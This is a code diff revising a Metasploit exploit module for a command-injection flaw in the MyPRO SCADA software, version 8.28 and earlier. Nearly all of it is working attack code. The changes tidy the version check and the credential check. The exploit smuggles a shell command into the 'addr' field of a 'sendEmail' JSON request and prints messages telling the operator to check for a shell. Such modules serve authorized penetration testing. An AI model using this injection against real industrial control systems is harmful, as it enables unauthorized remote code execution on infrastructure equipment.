Revised the code to make it cleaner

Author: h4x-x0r

modules/exploits/windows/scada/mypro_cmdexe.rb

@@ -20,7 +20,7 @@ def initialize(info = {})
         ],
         'DisclosureDate' => '2022-09-22',
         'Platform' => 'win',
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Windows_Fetch',
@@ -72,25 +72,18 @@ def check
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
       return CheckCode::Unknown
-    ensure
-      disconnect
     end
 
     if res && res.code == 200
-      regex = /\{.*\}/m
-      json_body = res.body[regex, 0]
-      data = JSON.parse(json_body)
+      data = res.get_json_document
       version = data['V']
       if version.nil?
         return CheckCode::Unknown
       else
         vprint_status('Version retrieved: ' + version)
       end
 
-      parts = version.split('.')
-      major = parts[0]
-      minor = parts[1]
-      if major.to_i == 8 && minor.to_i <= 28
+      if Rex::Version.new(version) <= Rex::Version.new('8.28')
         return CheckCode::Appears
       else
         return CheckCode::Safe
@@ -101,11 +94,7 @@ def check
   end
 
   def exploit
-    connect
-    case target['Type']
-    when :win_fetch
-      execute_command(payload.encoded)
-    end
+    execute_command(payload.encoded)
   end
 
   def execute_command(cmd)
@@ -114,7 +103,6 @@ def execute_command(cmd)
     print_status('Sending command injection...')
     exec_mypro(cmd)
     print_status('Exploit finished, check thy shell.')
-    handler
   end
 
   # Check if credentials are working
@@ -130,11 +118,13 @@ def check_auth
     unless res
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
-    if res && res.code == 401
-      fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')
-    end
-    if res && res.code == 200
+    case res.code
+    when 200
       print_good('Credentials are working.')
+    when 401
+      fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
     end
   end
 
@@ -147,7 +137,7 @@ def exec_mypro(cmd)
 
     post_data = {
       'type' => 'sendEmail',
-      'addr' => 'addr' + '"&&' + cmd
+      'addr' => "addr\"&&#{cmd}"
     }
     post_json = JSON.generate(post_data)
 
@@ -162,9 +152,7 @@ def exec_mypro(cmd)
 
     })
 
-    # unless res # We don't fail from this check because the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response.
-    #   print_status("Failed to receive a reply from the server, probably waiting on injected command to finish. Check if you got a shell already.")
-    # end
+    # We don't fail if no response is received, as the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response.
 
     if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned.
       print_good('Command successfully executed, check your shell.')